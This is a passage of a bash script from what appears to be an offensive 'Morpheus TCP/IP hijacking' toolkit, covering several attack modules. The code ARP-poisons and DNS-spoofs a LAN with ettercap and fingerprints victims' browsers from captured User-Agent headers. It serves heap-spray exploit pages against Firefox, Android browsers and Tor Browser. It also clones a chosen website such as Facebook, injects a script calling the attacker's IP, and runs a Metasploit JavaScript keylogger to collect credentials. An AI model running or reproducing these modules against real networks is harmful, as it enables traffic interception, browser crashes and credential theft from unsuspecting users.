      echo -e ${YellowF}[☠]${white} Press ${YellowF}[q]${white} to quit ettercap framework${RedF}!${Reset};   
      sleep 2
      if [ "$IpV" = "ACTIVE" ]; then
        if [ "$LoGs" = "NO" ]; then
        echo -e ${GreenF}[☠]${white} Using IPv6 settings${RedF}!${Reset};
        ettercap -T -q -i $InT3R -P dns_spoof -M ARP /$rhost// /$gateway//
        else
        echo -e ${GreenF}[☠]${white} Using IPv6 settings${RedF}!${Reset};
        ettercap -T -q -i $InT3R -P dns_spoof -L $IPATH/logs/clone_creds -M ARP /$rhost// /$gateway//
        fi

      else

        if [ "$LoGs" = "YES" ]; then
        echo -e ${GreenF}[☠]${white} Using IPv4 settings${RedF}!${Reset};
        ettercap -T -q -i $InT3R -P dns_spoof -M ARP /$rhost/ /$gateway/
        else
        echo -e ${GreenF}[☠]${white} Using IPv4 settings${RedF}!${Reset};
        ettercap -T -q -i $InT3R -P dns_spoof -L $IPATH/logs/clone_creds -M ARP /$rhost/ /$gateway/
        fi
      fi

  # clean up
  echo -e ${BlueF}[☠]${white} Cleaning recent files${RedF}!${Reset};
systemctl stop httpd | zenity --progress --pulsate --title "☠ PLEASE WAIT ☠" --text="Stop apache2 webserver" --percentage=0 --auto-close --width 270 > /dev/null 2>&1
  mv /tmp/etter.dns $Edns > /dev/null 2>&1
  mv $IPATH/bin/etter.rb $IPATH/bin/etter.dns > /dev/null 2>&1
  rm $ApachE/miss.png > /dev/null 2>&1
  rm $ApachE/$dIc > /dev/null 2>&1
  cd $IPATH
  # port-forward
  # echo -e "0" > /proc/sys/net/ipv4/ip_forward
  sleep 2

else
  echo -e ${RedF}[x]${white} Abort current tasks${RedF}!${Reset};
  sleep 2
fi
}






# ----------------------------------------------------
# FIREFOX =< 49.0.1 DENIAL-OF-SERVICE [mitm+dns_spoof]
# ----------------------------------------------------
sh_stage10 () {
echo -e ""
echo -e "${BlueF}    ╔───────────────────────────────────────────────────────────────────╗"
echo -e "${BlueF}    | ${YellowF} This module will crash target mozilla firefox (=< 49.0.1) using  ${BlueF}|"
echo -e "${BlueF}    | ${YellowF} a Heap Spray writen in javascript (deliver under mitm+dns_spoof) ${BlueF}|"
echo -e "${BlueF}    | ${YellowF}  'All [.com] domains will be redirected to the exploit webpage'  ${BlueF}|"
echo -e "${BlueF}    | ${YellowF}                                                                  ${BlueF}|"
echo -e "${BlueF}    | ${YellowF}  1 - Capture a tcp/udp packet from target host to verify vuln    ${BlueF}|"
echo -e "${BlueF}    | ${YellowF}  2 - If firefox version its exploitable then deliver payload.    ${BlueF}|"
echo -e "${BlueF}    ╚───────────────────────────────────────────────────────────────────╝"
echo -e ""
sleep 2
# run module?
rUn=$(zenity --question --title="☠ MORPHEUS TCP/IP HIJACKING ☠" --text "Execute this module?" --width 270) > /dev/null 2>&1
if [ "$?" -eq "0" ]; then

# get user input to build filter
rm $IPATH/logs/UserAgent.log > /dev/null 2>&1
echo -e ${BlueF}[☠]${white} Enter filter settings${RedF}! ${Reset};
rhost=$(zenity --title="☠ Enter  RHOST ☠" --text "'morpheus arp poison settings'\n\Leave blank to poison all local lan." --entry --width 270) > /dev/null 2>&1
gateway=$(zenity --title="☠ Enter GATEWAY ☠" --text "'morpheus arp poison settings'\nLeave blank to poison all local lan." --entry --width 270) > /dev/null 2>&1
UpL=$(zenity --title="☠ HOST TO FILTER ☠" --text "example: $IP\nchose target to filter through morpheus." --entry --width 270) > /dev/null 2>&1


  echo -e ${BlueF}[☠]${white} Backup files needed${RedF}!${Reset};
  sleep 1
  # backup all files needed.
  cd $IPATH/bin
  cp $IPATH/bin/etter.dns etter.rb # backup (NO dev/null to report file not existence)
  cp $Edns /tmp/etter.dns > /dev/null 2>&1 # backup
  cp $IPATH/filters/UserAgent.eft $IPATH/filters/UserAgent.rb > /dev/null 2>&1 # backup
  # copy files to apache2 webroot
  cp $IPATH/bin/phishing/Firefox-D0S-49.0.1.html $ApachE/index.html > /dev/null 2>&1
  # use SED bash command
  sed -i "s|TaRgEt|$UpL|g" $IPATH/filters/UserAgent.eft > /dev/null 2>&1
  sed -i "s|TaRgEt|$IP|g" etter.dns > /dev/null 2>&1
  sed -i "s|PrE|$PrEfI|g" etter.dns > /dev/null 2>&1
  cp $IPATH/bin/etter.dns $Edns > /dev/null 2>&1
  echo -e ${BlueF}[☠]${white} Etter.dns configurated...${Reset};
  cd $IPATH
  sleep 1

  # compiling UserAgent.eft to be used in ettercap
  echo -e ${BlueF}[☠]${white} Compiling UserAgent.eft${RedF}!${Reset};
  xterm -T "MORPHEUS - COMPILING" -geometry 90x26 -e "etterfilter $IPATH/filters/UserAgent.eft -o $IPATH/output/UserAgent.ef && sleep 3"
  sleep 1

# start apache2 webserver...
echo -e ${BlueF}[☠]${white} Start apache2 webserver...${Reset};
systemctl start httpd | zenity --progress --pulsate --title "☠ PLEASE WAIT ☠" --text="Starting apache2 webserver" --percentage=0 --auto-close --width 270 > /dev/null 2>&1

      # run mitm+filter
      cd $IPATH/logs
      echo -e ${BlueF}[☠]${white} Please wait, For User-Agent Capture${RedF}!${Reset}; 
      sleep 2
      if [ "$IpV" = "ACTIVE" ]; then
        xterm -T "MORPHEUS - user-agent capture" -geometry 90x42 -e "ettercap -T -s 's(4)' --visual text -q -i $InT3R -F $IPATH/output/UserAgent.ef -M ARP /$rhost// /$gateway// && sleep 3"
      else
        xterm -T "MORPHEUS - user-agent capture" -geometry 90x42 -e "ettercap -T -s 's(4)' --visual text -q -i $InT3R -F $IPATH/output/UserAgent.ef -M ARP /$rhost/ /$gateway/ && sleep 3"
      fi

  cd $IPATH/logs
  # display captured user-agent strings to user
  # User-Agent: Mozilla/5.0 (X11; Linux i686; rv:45.0) Gecko/20100101 Firefox/45.0
  nOn="49" # above versions are patched (official release its 51.0.1)...
  tr -cd '\11\12\15\40-\176' < UserAgent.log > clean-file.log # remove non-ancii caracters
  mv clean-file.log UserAgent.log > /dev/null 2>&1
  HoSt=`cat $IPATH/logs/UserAgent.log | egrep -m 1 "Host:" | awk {'print'}` > /dev/null 2>&1
  AcLa=`cat $IPATH/logs/UserAgent.log | egrep -m 1 "Accept-Language" | awk {'print'}` > /dev/null 2>&1
  DisP=`cat $IPATH/logs/UserAgent.log | egrep -m 1 "User-Agent:" | awk {'print'}` > /dev/null 2>&1
  VeVul=`cat $IPATH/logs/UserAgent.log | egrep -m 1 "User-Agent" | cut -d 'F' -f2 | cut -d '/' -f2 | cut -d '.' -f1` > /dev/null 2>&1
  echo -e "${GreenF}    $HoSt"
  sleep 1
  echo -e "${GreenF}    $AcLa"
  sleep 1
  echo -e "${GreenF}    $DisP"
  sleep 1

cd $IPATH
# check if target system its vulnerable (firefox version)
if [ "$VeVul" \> "$nOn" ]; then
echo -e "${GreenF}    Browser report:${RedF} not vulnerable...${BlueF}"
sleep 3
echo -e "${RedF}[x] warning: running against a non-compatible target!"
sleep 1
else
echo -e "${GreenF}    Browser report: vulnerable...${BlueF}"
sleep 3
fi

      # run mitm+filter
      cd $IPATH/logs
      echo -e ${BlueF}[☠]${white} Running ARP poison + etter filter${RedF}!${Reset};
      echo -e ${YellowF}[☠]${white} Press ${YellowF}[q]${white} to quit ettercap framework${RedF}!${Reset};   
      sleep 2
      if [ "$IpV" = "ACTIVE" ]; then
        if [ "$LoGs" = "NO" ]; then
        echo -e ${GreenF}[☠]${white} Using IPv6 settings${RedF}!${Reset};
        ettercap -T -Q -i $InT3R -P dns_spoof -M ARP /$rhost// /$gateway//
        else
        echo -e ${GreenF}[☠]${white} Using IPv6 settings${RedF}!${Reset};
        ettercap -T -Q -i $InT3R -P dns_spoof -L $IPATH/logs/Firefox_buffer -M ARP /$rhost// /$gateway//
        fi

      else

        if [ "$LoGs" = "YES" ]; then
        echo -e ${GreenF}[☠]${white} Using IPv4 settings${RedF}!${Reset};
        ettercap -T -Q -i $InT3R -P dns_spoof -M ARP /$rhost/ /$gateway/
        else
        echo -e ${GreenF}[☠]${white} Using IPv4 settings${RedF}!${Reset};
        ettercap -T -Q -i $InT3R -P dns_spoof -L $IPATH/logs/Firefox_buffer -M ARP /$rhost/ /$gateway/
        fi
      fi


  # clean up
  echo -e ${BlueF}[☠]${white} Cleaning recent files${RedF}!${Reset};
systemctl stop httpd | zenity --progress --pulsate --title "☠ PLEASE WAIT ☠" --text="Stop apache2 webserver" --percentage=0 --auto-close --width 270 > /dev/null 2>&1
  mv /tmp/etter.dns $Edns > /dev/null 2>&1
  mv $IPATH/bin/etter.rb $IPATH/bin/etter.dns > /dev/null 2>&1
  mv $IPATH/filters/UserAgent.rb $IPATH/filters/UserAgent.eft > /dev/null 2>&1 # backup
  rm $IPATH/output/UserAgent.ef > /dev/null 2>&1
  rm $ApachE/index.html > /dev/null 2>&1
  cd $IPATH
  # port-forward
  # echo -e "0" > /proc/sys/net/ipv4/ip_forward
  sleep 2

else
  echo -e ${RedF}[x]${white} Abort current tasks${RedF}!${Reset};
  sleep 2
fi
}






# --------------------------------------------------
# ANDROID BROWSER DENIAL-OF-SERVICE [mitm+dns_spoof]
# --------------------------------------------------
sh_stage11 () {
echo -e ""
echo -e "${BlueF}    ╔───────────────────────────────────────────────────────────────────╗"
echo -e "${BlueF}    | ${YellowF}    This module will crash target android browser by using a      ${BlueF}|"
echo -e "${BlueF}    | ${YellowF}   Heap Spray writen in javascript (deliver under mitm+dns_spoof) ${BlueF}|"
echo -e "${BlueF}    | ${YellowF}   'All [.com] domains will be redirected to the exploit webpage' ${BlueF}|"
echo -e "${BlueF}    | ${YellowF}                                                                  ${BlueF}|"
echo -e "${BlueF}    | ${YellowF}   1 - Capture a tcp/udp packet from target host to verify vuln   ${BlueF}|"
echo -e "${BlueF}    | ${YellowF}   2 - If browser version its exploitable then deliver payload.   ${BlueF}|"
echo -e "${BlueF}    ╚───────────────────────────────────────────────────────────────────╝"
echo -e ""
sleep 2
# run module?
rUn=$(zenity --question --title="☠ MORPHEUS TCP/IP HIJACKING ☠" --text "Execute this module?" --width 270) > /dev/null 2>&1
if [ "$?" -eq "0" ]; then

# get user input to build filter
rm $IPATH/logs/UserAgent.log > /dev/null 2>&1
echo -e ${BlueF}[☠]${white} Enter filter settings${RedF}! ${Reset};
rhost=$(zenity --title="☠ Enter  RHOST ☠" --text "'morpheus arp poison settings'\n\Leave blank to poison all local lan." --entry --width 270) > /dev/null 2>&1
gateway=$(zenity --title="☠ Enter GATEWAY ☠" --text "'morpheus arp poison settings'\nLeave blank to poison all local lan." --entry --width 270) > /dev/null 2>&1
UpL=$(zenity --title="☠ HOST TO FILTER ☠" --text "example: $IP\nchose target to filter through morpheus." --entry --width 270) > /dev/null 2>&1


  echo -e ${BlueF}[☠]${white} Backup files needed${RedF}!${Reset};
  sleep 1
  # backup all files needed.
  cd $IPATH/bin
  cp $IPATH/bin/etter.dns etter.rb # backup (NO dev/null to report file not existence)
  cp $Edns /tmp/etter.dns > /dev/null 2>&1 # backup
  cp $IPATH/filters/UserAgent.eft $IPATH/filters/UserAgent.rb > /dev/null 2>&1 # backup
  # copy files to apache2 webroot
  cp $IPATH/bin/phishing/Android-DOS-4.0.3.html $ApachE/index.html > /dev/null 2>&1
  # use SED bash command
  sed -i "s|TaRgEt|$UpL|g" $IPATH/filters/UserAgent.eft > /dev/null 2>&1
  sed -i "s|TaRgEt|$IP|g" etter.dns > /dev/null 2>&1
  sed -i "s|PrE|$PrEfI|g" etter.dns > /dev/null 2>&1
  cp $IPATH/bin/etter.dns $Edns > /dev/null 2>&1
  echo -e ${BlueF}[☠]${white} Etter.dns configurated...${Reset};
  cd $IPATH
  sleep 1

  # compiling UserAgent.eft to be used in ettercap
  echo -e ${BlueF}[☠]${white} Compiling UserAgent.eft${RedF}!${Reset};
  xterm -T "MORPHEUS - COMPILING" -geometry 90x26 -e "etterfilter $IPATH/filters/UserAgent.eft -o $IPATH/output/UserAgent.ef && sleep 3"
  sleep 1

# start apache2 webserver...
echo -e ${BlueF}[☠]${white} Start apache2 webserver...${Reset};
systemctl start httpd | zenity --progress --pulsate --title "☠ PLEASE WAIT ☠" --text="Starting apache2 webserver" --percentage=0 --auto-close --width 270 > /dev/null 2>&1

      # run mitm+filter
      cd $IPATH/logs
      echo -e ${BlueF}[☠]${white} Please wait, For User-Agent Capture${RedF}!${Reset}; 
      sleep 2
      if [ "$IpV" = "ACTIVE" ]; then
        xterm -T "MORPHEUS - user-agent capture" -geometry 90x42 -e "ettercap -T -s 's(4)' --visual text -q -i $InT3R -F $IPATH/output/UserAgent.ef -M ARP /$rhost// /$gateway// && sleep 3"
      else
        xterm -T "MORPHEUS - user-agent capture" -geometry 90x42 -e "ettercap -T -s 's(4)' --visual text -q -i $InT3R -F $IPATH/output/UserAgent.ef -M ARP /$rhost/ /$gateway/ && sleep 3"
      fi

  cd $IPATH/logs
  # display captured user-agent strings to user
  # Mozilla/5.0 (Linux; Android 6.0.1; VFD 600 Build/MMB29M) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.89
  # Mozilla/5.0 (Linux; U; Android 4.0.3; LG-L160L Build/IML74K) AppleWebkit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30
  nOn="Android"
  tr -cd '\11\12\15\40-\176' < UserAgent.log > clean-file.log # remove non-ancii caracters
  mv clean-file.log UserAgent.log > /dev/null 2>&1
  HoSt=`cat $IPATH/logs/UserAgent.log | egrep -m 1 "Host:" | awk {'print'}` > /dev/null 2>&1
  AcLa=`cat $IPATH/logs/UserAgent.log | egrep -m 1 "Accept-Language" | awk {'print'}` > /dev/null 2>&1
  DisP=`cat $IPATH/logs/UserAgent.log | egrep -m 1 "User-Agent:" | awk {'print'}` > /dev/null 2>&1
  VeVul=`cat $IPATH/logs/UserAgent.log | egrep -m 1 "User-Agent:" | grep -o "Android"` > /dev/null 2>&1 # user-agent == Android
  echo -e "${GreenF}    $HoSt"
  sleep 1
  echo -e "${GreenF}    $AcLa"
  sleep 1
  echo -e "${GreenF}    $DisP"
  sleep 1

cd $IPATH
# if in captured packet its writen: Android then its vulnerable
if [ "$VeVul" = "$nOn" ]; then
echo -e "${GreenF}    Browser report: vulnerable...${BlueF}"
sleep 3
else
echo -e "${GreenF}    Browser report:${RedF} not vulnerable...${BlueF}"
sleep 3
echo -e "${RedF}[x] warning: running against a non-compatible target!"
sleep 1
fi

      # run mitm+filter
      cd $IPATH/logs
      echo -e ${BlueF}[☠]${white} Running ARP poison + etter filter${RedF}!${Reset};
      echo -e ${YellowF}[☠]${white} Press ${YellowF}[q]${white} to quit ettercap framework${RedF}!${Reset};   
      sleep 2
      if [ "$IpV" = "ACTIVE" ]; then
        if [ "$LoGs" = "NO" ]; then
        echo -e ${GreenF}[☠]${white} Using IPv6 settings${RedF}!${Reset};
        ettercap -T -Q -i $InT3R -P dns_spoof -M ARP /$rhost// /$gateway//
        else
        echo -e ${GreenF}[☠]${white} Using IPv6 settings${RedF}!${Reset};
        ettercap -T -Q -i $InT3R -P dns_spoof -L $IPATH/logs/Firefox_buffer -M ARP /$rhost// /$gateway//
        fi

      else

        if [ "$LoGs" = "YES" ]; then
        echo -e ${GreenF}[☠]${white} Using IPv4 settings${RedF}!${Reset};
        ettercap -T -Q -i $InT3R -P dns_spoof -M ARP /$rhost/ /$gateway/
        else
        echo -e ${GreenF}[☠]${white} Using IPv4 settings${RedF}!${Reset};
        ettercap -T -Q -i $InT3R -P dns_spoof -L $IPATH/logs/Firefox_buffer -M ARP /$rhost/ /$gateway/
        fi
      fi


  # clean up
  echo -e ${BlueF}[☠]${white} Cleaning recent files${RedF}!${Reset};
systemctl stop httpd | zenity --progress --pulsate --title "☠ PLEASE WAIT ☠" --text="Stop apache2 webserver" --percentage=0 --auto-close --width 270 > /dev/null 2>&1
  mv /tmp/etter.dns $Edns > /dev/null 2>&1
  mv $IPATH/bin/etter.rb $IPATH/bin/etter.dns > /dev/null 2>&1
  mv $IPATH/filters/UserAgent.rb $IPATH/filters/UserAgent.eft > /dev/null 2>&1 # backup
  rm $IPATH/output/UserAgent.ef > /dev/null 2>&1
  rm $ApachE/index.html > /dev/null 2>&1
  cd $IPATH
  # port-forward
  # echo -e "0" > /proc/sys/net/ipv4/ip_forward
  sleep 2

else
  echo -e ${RedF}[x]${white} Abort current tasks${RedF}!${Reset};
  sleep 2
fi
}





# -----------------------------------------------------
# TOR-BROWSER BUFFER OVERFLOW EXPLOIT [windows systems]
# -----------------------------------------------------
sh_stage12 () {
echo -e ""
echo -e "${BlueF}    ╔───────────────────────────────────────────────────────────────────╗"
echo -e "${BlueF}    | ${YellowF} This module will crash target tor-browser (windows sys) using a  ${BlueF}|"
echo -e "${BlueF}    | ${YellowF} Heap Spray writen in javascript (deliver under mitm + dns_spoof) ${BlueF}|"
echo -e "${BlueF}    | ${YellowF}  'All [.com] domains will be redirected to the exploit webpage'  ${BlueF}|"
echo -e "${BlueF}    | ${YellowF}                                                                  ${BlueF}|"
echo -e "${BlueF}    | ${YellowF}  1 - Capture a tcp/udp packet from target host to verify vuln    ${BlueF}|"
echo -e "${BlueF}    | ${YellowF}  2 - If tor version its exploitable then deliver payload.        ${BlueF}|"
echo -e "${BlueF}    ╚───────────────────────────────────────────────────────────────────╝"
echo -e ""
sleep 2
# run module?
rUn=$(zenity --question --title="☠ MORPHEUS TCP/IP HIJACKING ☠" --text "Execute this module?" --width 270) > /dev/null 2>&1
if [ "$?" -eq "0" ]; then

# get user input to build filter
rm $IPATH/logs/UserAgent.log > /dev/null 2>&1
echo -e ${BlueF}[☠]${white} Enter filter settings${RedF}! ${Reset};
rhost=$(zenity --title="☠ Enter  RHOST ☠" --text "'morpheus arp poison settings'\n\Leave blank to poison all local lan." --entry --width 270) > /dev/null 2>&1
gateway=$(zenity --title="☠ Enter GATEWAY ☠" --text "'morpheus arp poison settings'\nLeave blank to poison all local lan." --entry --width 270) > /dev/null 2>&1
UpL=$(zenity --title="☠ HOST TO FILTER ☠" --text "example: $IP\nchose target to filter through morpheus." --entry --width 270) > /dev/null 2>&1


  echo -e ${BlueF}[☠]${white} Backup files needed${RedF}!${Reset};
  sleep 1
  # backup all files needed.
  cd $IPATH/bin
  cp $IPATH/bin/etter.dns etter.rb # backup (NO dev/null to report file not existence)
  cp $Edns /tmp/etter.dns > /dev/null 2>&1 # backup
  cp $IPATH/filters/UserAgent.eft $IPATH/filters/UserAgent.rb > /dev/null 2>&1 # backup
  # copy files to apache2 webroot
  cp $IPATH/bin/phishing/tor_0day/cssbanner.js $ApachE/cssbanner.js > /dev/null 2>&1
  cp $IPATH/bin/phishing/tor_0day/Tor-Exploit.html $ApachE/index.html > /dev/null 2>&1
  # use SED bash command
  sed -i "s|TaRgEt|$UpL|g" $IPATH/filters/UserAgent.eft > /dev/null 2>&1
  sed -i "s|TaRgEt|$IP|g" etter.dns > /dev/null 2>&1
  sed -i "s|PrE|$PrEfI|g" etter.dns > /dev/null 2>&1
  cp $IPATH/bin/etter.dns $Edns > /dev/null 2>&1
  echo -e ${BlueF}[☠]${white} Etter.dns configurated...${Reset};
  cd $IPATH
  sleep 1

  # compiling UserAgent.eft to be used in ettercap
  echo -e ${BlueF}[☠]${white} Compiling UserAgent.eft${RedF}!${Reset};
  xterm -T "MORPHEUS - COMPILING" -geometry 90x26 -e "etterfilter $IPATH/filters/UserAgent.eft -o $IPATH/output/UserAgent.ef && sleep 3"
  sleep 1

# start apache2 webserver...
echo -e ${BlueF}[☠]${white} Start apache2 webserver...${Reset};
systemctl start httpd | zenity --progress --pulsate --title "☠ PLEASE WAIT ☠" --text="Starting apache2 webserver" --percentage=0 --auto-close --width 270 > /dev/null 2>&1

      # run mitm+filter
      cd $IPATH/logs
      echo -e ${BlueF}[☠]${white} Please wait, For User-Agent Capture${RedF}!${Reset}; 
      sleep 2
      if [ "$IpV" = "ACTIVE" ]; then
        xterm -T "MORPHEUS - user-agent capture" -geometry 90x42 -e "ettercap -T -s 's(4)' --visual text -q -i $InT3R -F $IPATH/output/UserAgent.ef -M ARP /$rhost// /$gateway// && sleep 3"
      else
        xterm -T "MORPHEUS - user-agent capture" -geometry 90x42 -e "ettercap -T -s 's(4)' --visual text -q -i $InT3R -F $IPATH/output/UserAgent.ef -M ARP /$rhost/ /$gateway/ && sleep 3"
      fi

  cd $IPATH/logs
  # display captured user-agent strings to user
  # User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:45.0) Gecko/20100101 Firefox/45.0
  nOn="Windows NT" # only windows systems are affected...
  tr -cd '\11\12\15\40-\176' < UserAgent.log > clean-file.log # remove non-ancii caracters
  mv clean-file.log UserAgent.log > /dev/null 2>&1
  HoSt=`cat $IPATH/logs/UserAgent.log | egrep -m 1 "Host:" | awk {'print'}` > /dev/null 2>&1
  AcLa=`cat $IPATH/logs/UserAgent.log | egrep -m 1 "Accept-Language" | awk {'print'}` > /dev/null 2>&1
  VeVul=`cat $IPATH/logs/UserAgent.log | egrep -m 1 "User-Agent:" | grep -o "Windows NT"` > /dev/null 2>&1
  DisP=`cat $IPATH/logs/UserAgent.log | egrep -m 1 "User-Agent:" | awk {'print'}` > /dev/null 2>&1
  echo -e "${GreenF}    $HoSt"
  sleep 1
  echo -e "${GreenF}    $AcLa"
  sleep 1
  echo -e "${GreenF}    $DisP"
  sleep 1

cd $IPATH
# check if target system its vulnerable (windows systems)
if [ "$VeVul" != "$nOn" ]; then
echo -e "${GreenF}    System report:${RedF} not vulnerable...${BlueF}"
sleep 3
echo -e "${RedF}[x] warning: running against a non-compatible target!"
sleep 1
else
echo -e "${GreenF}    System report: vulnerable...${BlueF}"
sleep 3
fi

      # run mitm+filter
      cd $IPATH/logs
      echo -e ${BlueF}[☠]${white} Running ARP poison + etter filter${RedF}!${Reset};
      echo -e ${YellowF}[☠]${white} Press ${YellowF}[q]${white} to quit ettercap framework${RedF}!${Reset};   
      sleep 2
      if [ "$IpV" = "ACTIVE" ]; then
        if [ "$LoGs" = "NO" ]; then
        echo -e ${GreenF}[☠]${white} Using IPv6 settings${RedF}!${Reset};
        ettercap -T -Q -i $InT3R -P dns_spoof -M ARP /$rhost// /$gateway//
        else
        echo -e ${GreenF}[☠]${white} Using IPv6 settings${RedF}!${Reset};
        ettercap -T -Q -i $InT3R -P dns_spoof -L $IPATH/logs/tor_buffer -M ARP /$rhost// /$gateway//
        fi

      else

        if [ "$LoGs" = "YES" ]; then
        echo -e ${GreenF}[☠]${white} Using IPv4 settings${RedF}!${Reset};
        ettercap -T -Q -i $InT3R -P dns_spoof -M ARP /$rhost/ /$gateway/
        else
        echo -e ${GreenF}[☠]${white} Using IPv4 settings${RedF}!${Reset};
        ettercap -T -Q -i $InT3R -P dns_spoof -L $IPATH/logs/tor_buffer -M ARP /$rhost/ /$gateway/
        fi
      fi



  # clean up
  echo -e ${BlueF}[☠]${white} Cleaning recent files${RedF}!${Reset};
systemctl stop httpd | zenity --progress --pulsate --title "☠ PLEASE WAIT ☠" --text="Stop apache2 webserver" --percentage=0 --auto-close --width 270 > /dev/null 2>&1
  mv /tmp/etter.dns $Edns > /dev/null 2>&1
  mv $IPATH/bin/etter.rb $IPATH/bin/etter.dns > /dev/null 2>&1
  mv $IPATH/filters/UserAgent.rb $IPATH/filters/UserAgent.eft > /dev/null 2>&1 # backup
  rm $IPATH/output/UserAgent.ef > /dev/null 2>&1
  rm $ApachE/index.html > /dev/null 2>&1
  rm $ApachE/cssbanner.js > /dev/null 2>&1
  cd $IPATH
  # port-forward
  # echo -e "0" > /proc/sys/net/ipv4/ip_forward
  sleep 2

else
  echo -e ${RedF}[x]${white} Abort current tasks${RedF}!${Reset};
  sleep 2
fi
}






# ---------------------------------------------------------------
# INJECT A JAVA KEYLOOGER INTO TARGET WEBPAGE
# clone a website and inject a metasploit iframe (java_keylogger)
# ---------------------------------------------------------------
sh_stage13 () {
echo -e ""
echo -e "${BlueF}    ╔───────────────────────────────────────────────────────────────────╗"
echo -e "${BlueF}    | ${YellowF} This module will allow you to clone a webpage at your choice and ${BlueF}|"
echo -e "${BlueF}    | ${YellowF} inject a java keylooger on it, then uses mitm + dns_spoof to be  ${BlueF}|"
echo -e "${BlueF}    | ${YellowF} abble to redirect target traffic to the cloned webpage were the  ${BlueF}|"
echo -e "${BlueF}    | ${YellowF} java keylooger (metasploit required) waits for input credentials.${BlueF}|"
echo -e "${BlueF}    | ${YellowF}                                                                  ${BlueF}|"
echo -e "${BlueF}    | ${YellowF} WARNING:'msfconsole required to capture credentials from target' ${BlueF}|"
echo -e "${BlueF}    ╚───────────────────────────────────────────────────────────────────╝"
echo -e ""
sleep 2
# run module?
rUn=$(zenity --question --title="☠ MORPHEUS TCP/IP HIJACKING ☠" --text "Execute this module?" --width 270) > /dev/null 2>&1
if [ "$?" -eq "0" ]; then


echo -e ${BlueF}[☠]${white} Enter filter settings${RedF}! ${Reset};
rhost=$(zenity --title="☠ Enter  RHOST ☠" --text "'morpheus arp poison settings'\n\Leave blank to poison all local lan." --entry --width 270) > /dev/null 2>&1
gateway=$(zenity --title="☠ Enter GATEWAY ☠" --text "'morpheus arp poison settings'\nLeave blank to poison all local lan." --entry --width 270) > /dev/null 2>&1
cLon=$(zenity --title="☠ WEBPAGE TO CLONE ☠" --text "example: www.facebook.com\nchose domain name to be cloned." --entry --width 270) > /dev/null 2>&1


  # dowloading/clonning website target
  cd $IPATH/output && mkdir clone && cd clone
  echo -e ${BlueF}[☠]${white} Please wait, clonning webpage${RedF}!${Reset};
  sleep 1 && mkdir $cLon && cd $cLon
  # download -nd (no-directory) -nv (low verbose) -Q (download quota) -A (file type) -m (mirror)
  wget -qq -U Mozilla -m -nd -nv -Q 900000 -A.html,.jpg,.png,.ico,.php,.js,.css,.gif $cLon | zenity --progress --pulsate --title "☠ MORPHEUS TCP/IP HIJACKING ☠" --text="Cloning webpage: $cLon" --percentage=0 --auto-close --width 300 > /dev/null 2>&1
  # inject the javascript <TAG> in cloned index.html using SED command
  echo -e ${BlueF}[☠]${white} Inject javascript Into cloned webpage${RedF}!${Reset};
  sed "s/<\/body>/<script type='text\/javascript' src='http:\/\/$IP:8080\/support\/test.js'><\/script><\/body>/g" index.html > copy.html
  mv copy.html index.html > /dev/null 2>&1
  # copy all files to apache2 webroot
  echo -e ${BlueF}[☠]${white} Copy files to apache2 webroot${RedF}!${Reset};
  sleep 2
  cp index.html $ApachE/index.html # NO dev/null to report file not existence
  cd ..
  cp -r $cLon $ApachE/$cLon > /dev/null 2>&1
  cd $IPATH


    # backup all files needed.
    echo -e ${BlueF}[☠]${white} Backup files needed${RedF}!${Reset};
    cd $IPATH/bin
    cp $IPATH/bin/etter.dns $IPATH/bin/etter.rb # backup (NO dev/null to report file not existence)
    cp $Edns /tmp/etter.dns > /dev/null 2>&1 # backup
    # use SED bash command
    sed -i "s|TaRgEt|$IP|g" etter.dns > /dev/null 2>&1
    sed -i "s|PrE|$PrEfI|g" etter.dns > /dev/null 2>&1
    cp $IPATH/bin/etter.dns $Edns > /dev/null 2>&1
    echo -e ${BlueF}[☠]${white} Etter.dns configurated...${Reset};
    cd $IPATH
    sleep 1


    # start metasploit services
    echo -e ${BlueF}[☠]${white} Start metasploit services...${Reset};
    service postgresql start > /dev/null 2>&1
    if [ "$RbUdB" = "YES" ]; then
    msfdb delete > /dev/null 2>&1
    msfdb init > /dev/null 2>&1
    fi

# start apache2 webserver...
echo -e ${BlueF}[☠]${white} Start apache2 webserver...${Reset};
systemctl start httpd | zenity --progress --pulsate --title "☠ PLEASE WAIT ☠" --text="Starting apache2 webserver" --percentage=0 --auto-close --width 270 > /dev/null 2>&1

      # run mitm+filter
      echo -e ${BlueF}[☠]${white} Running ARP poison + etter filter${RedF}!${Reset};
      echo -e ${YellowF}[☠]${white} Press ${YellowF}[q]${white} to quit ettercap framework${RedF}!${Reset};   
      sleep 2
      if [ "$IpV" = "ACTIVE" ]; then
        echo -e ${GreenF}[☠]${white} Using IPv6 settings${RedF}!${Reset};
        xterm -T "MSFCONSOLE" -geometry 110x40 -e "sudo msfconsole -x 'use auxiliary/server/capture/http_javascript_keylogger; set DEMO 0; set LHOST $IP; set URIPATH support; exploit'" & ettercap -T -Q -i $InT3R -P dns_spoof -M arp /$rhost// /$gateway//
      else
        echo -e ${GreenF}[☠]${white} Using IPv4 settings${RedF}!${Reset};
        xterm -T "MORPHEUS TCP/IP HIJACKING" -geometry 110x40 -e "sudo msfconsole -x 'use auxiliary/server/capture/http_javascript_keylogger; set DEMO 0; set LHOST $IP; set URIPATH support; exploit'" & ettercap -T -Q -i $InT3R -P dns_spoof -M arp /$rhost/ /$gateway/
      fi


  # clean up
  echo -e ${BlueF}[☠]${white} Cleaning recent files${RedF}!${Reset};
  mv $LoGmSf/*.txt $IPATH/logs > /dev/null 2>&1
  mv $IPATH/bin/etter.rb $IPATH/bin/etter.dns > /dev/null 2>&1
  mv /tmp/etter.dns $Edns > /dev/null 2>&1
  rm -r $ApachE/$cLon > /dev/null 2>&1
  rm -r $IPATH/output/clone > /dev/null 2>&1
  cd $IPATH

# start apache2 webserver...
echo -e ${BlueF}[☠]${white} Stop apache2 webserver...${Reset};
systemctl stop httpd | zenity --progress --pulsate --title "☠ PLEASE WAIT ☠" --text="Stop apache2 webserver" --percentage=0 --auto-close --width 270 > /dev/null 2>&1
service postgresql stop > /dev/null 2>&1
# check if exist any reports
dd=`ls $IPATH/logs`
if ! [ -z "$dd" ]; then
Qu=$(zenity --info --title="☠ MORPHEUS TCP/IP HIJACKING ☠" --text "logfiles stored $IPATH/logs" --width 270) > /dev/null 2>&1
fi

else
  echo -e ${RedF}[x]${white} Abort current tasks${RedF}!${Reset};
  sleep 2
fi
}






# --------------------------------------
# MODEM/ROUTER PHISHING (java_keylogger)
# --------------------------------------
sh_stage14 () {
echo -e ""
